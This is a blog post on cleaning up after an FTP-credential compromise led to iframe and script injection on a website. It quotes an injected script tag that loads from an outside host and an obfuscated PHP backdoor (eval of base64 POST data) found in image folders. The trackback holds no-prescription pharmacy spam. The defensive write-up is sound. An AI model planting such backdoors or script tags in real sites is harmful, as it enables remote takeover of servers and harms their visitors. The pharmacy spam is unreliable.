Skip to content

Iframe Injection Prevention

How to Recover after injection

I had a break through in my hosting account. I figured out that my ftp client has been infected and through it, they got my passwords. They took the opportunity to infect <iframe> quite a few of my files and mainly index.php, html, htm, asp … as well as default. php, html, htm, asp …and main.php, html, htm, asp …  are prioritized. These hacks  insert <iframe>  tag before or after <body> tag or they add <iframe> at the end of the file. I was interested and looked profoundly through all my files. I figured out that was injected not only <iframe> injection, but also javascript, which looks the following way: <script src=http://anydisk.anyprinting.com/webfolder/index.php ></script>. After the injection many scripts came out for searching through each and every file from the hosting directory and clean up the infected scripts, but I do not recommend using automatic deletion. Do it manually. Use the scanning which is very convenient in this case. I personally used the explot plugin with which I scanned and found part of the iframe injection. I manually scanned with the explot plugin for javascript injection and deleted everything manually. And that was the end of it. I found out a file named  gifimg.php with the following content:

<?php  eval(base64_decode(‘aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29

kZSgkX1BPU1RbJ2UnXSkpO2Vsc2UgZGllKCc0MDQgTm90IEZvdW5kJyk7′));?>

in all the images directories.

How to clean up injection?

I advise you to manually remove the <iframe> infected tags from the infected files. You should also delete <javascrip> infected files. Check your directories named images for files named  gifimg.php and delete them

How to secure myself from injection?

  1. You should update your antivirus software.
  2. Scan your computer for infected files
  3. If you are running your hosting with webbased platform CP (Control Pannel) and etc., you should filter the FTP connection and allow only your personal IP. In order to do this, please follow the next steps:

a) ftp.allow with the following content:

ALL:   95.87.228.123

And in the place of 95.87.228.123 write your personal IP. This will allow the ftp from the chosen IP.

b) ftp.deny with content:

ALL:   ALL

This will forbid ftp access to all but the selected in point 1 IP.

That’s all, good luck.!

Republished by Blog Post Promoter

Posted in Wordpress Injection.

Tagged with , , , , , , , .

1 comment

By admin August 17, 2010

One Response

Stay in touch with the conversation, subscribe to the RSS feed for comments on this post.

Continuing the Discussion

  1. DAVID linked to this post on September 7, 2010


    CheapTabletsOnline.Com. Canadian Health&Care.Special Internet Prices.Best quality drugs.No prescription online pharmacy. Online Pharmacy. Buy pills online

    Buy:Female Pink Viagra.Aricept.Prozac.Benicar.Zocor.Seroquel.Acomplia.Nymphomax.Lasix.Female Cialis.Zetia.Buspar.SleepWell.Lipothin.Amoxicillin.Cozaar.Advair.Ventolin.Wellbutrin SR.Lipitor….



Some HTML is OK

or, reply to this post via trackback.

« »